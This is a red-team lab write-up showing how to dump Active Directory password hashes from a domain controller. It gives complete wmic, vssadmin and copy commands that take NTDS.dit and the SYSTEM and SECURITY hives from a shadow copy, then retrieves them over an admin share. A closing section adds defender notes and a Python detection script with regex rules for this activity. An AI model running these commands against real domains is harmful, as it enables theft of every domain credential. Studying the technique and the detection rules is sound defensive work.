# Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy

This quick lab shows how to dump all user hashes from a Domain Controller by remotely creating a shadow copy of its C drive with vssadmin.

This lab assumes the attacker has already gained administrative access to the domain controller.

## Execution

Create a shadow copy of the C drive of the Domain Controller:

{% code title="attacker\@victim" %}

```cmd
wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
```

{% endcode %}

![](/files/-LfaP9JMv1K3AOzIQNBc)

Copy the NTDS.dit file and the SYSTEM and SECURITY registry hives out of the shadow copy to C:\temp on DC01:

{% code title="attacker\@victim" %}

```cmd
wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"
```

{% endcode %}

The screenshot below shows the above command executed on the attacking machine (right) and the files being dumped to c:\temp on DC01 (left):

![](/files/-Lfa_NvNdi0W11EARqKP)

Map DC01\c$\temp as a local drive in order to retrieve the dumped files:

{% code title="attacker\@victim" %}

```powershell
net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\
```

{% endcode %}

![](/files/-Lfa_lAev0lVzTL40dh-)

Now, off you go extracting hashes with secretsdump as shown here:

{% content-ref url="/pages/-LHwpaPZnf94MyLpTb2z" %}
[Dumping Domain Controller Hashes Locally and Remotely](/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration.md)
{% endcontent-ref %}

## Observations

A quick note for defenders on the process ancestry:

![](/files/-LfaPCUFMkVICWg5F4zc)

and of course the command lines:

![](/files/-LfabW8Rhdez1VI3WLZt)

as well as service states:

![](/files/-Lfaavm-6B3pUsOpbfYF)

...and of course the lateral movement piece:

![](/files/-LfahZYptQD0OS_inswZ)
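The process ancestry and command-line artefacts above can be turned into a detection. The following is an added example, not part of the original lab: a small Python classifier run over constructed Sysmon-style process-creation events (the field names and the sample events are assumptions, modelled on what the screenshots show).

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# These are not real logs from the lab host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd /c vssadmin create shadow /for=C: 2>&1"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"vssadmin create shadow /for=C:"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"vssadmin list shadows"},  # benign backup/admin activity
]

# Device path used to read files straight out of a shadow copy
SHADOW_COPY_PATH = re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I)
# AD database and the registry hives needed to decrypt it
SENSITIVE_FILES = re.compile(r"\\(NTDS\\NTDS\.dit|config\\(SYSTEM|SECURITY|SAM))\b", re.I)
# Parent of processes started remotely through WMI (the wmic /node case)
WMI_PARENT = re.compile(r"\\WmiPrvSE\.exe$", re.I)
VSS_CREATE = re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)


def classify(event):
    """Return the list of (rule, severity) tags that fire for one event."""
    cmd = event.get("CommandLine", "")
    remote_wmi = bool(WMI_PARENT.search(event.get("ParentImage", "")))
    tags = []
    if VSS_CREATE.search(cmd):
        # Shadow copy creation; high when spawned via WMI rather than by a
        # locally running backup agent
        tags.append(("vss_create_shadow", "high" if remote_wmi else "medium"))
    if SHADOW_COPY_PATH.search(cmd) and SENSITIVE_FILES.search(cmd):
        # Copying NTDS.dit or hives out of a shadow copy bypasses file locks
        tags.append(("shadow_copy_credential_file_access", "critical"))
    elif remote_wmi:
        tags.append(("wmi_spawned_process", "low"))
    return tags


def scan(events):
    """Return [(index, tags)] for every event that matched at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the `vssadmin list shadows` event alone, so the rules key on shadow creation and shadow-copy file access rather than on vssadmin itself.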

## References

<https://twitter.com/netmux/status/1123936748000690178?s=12>


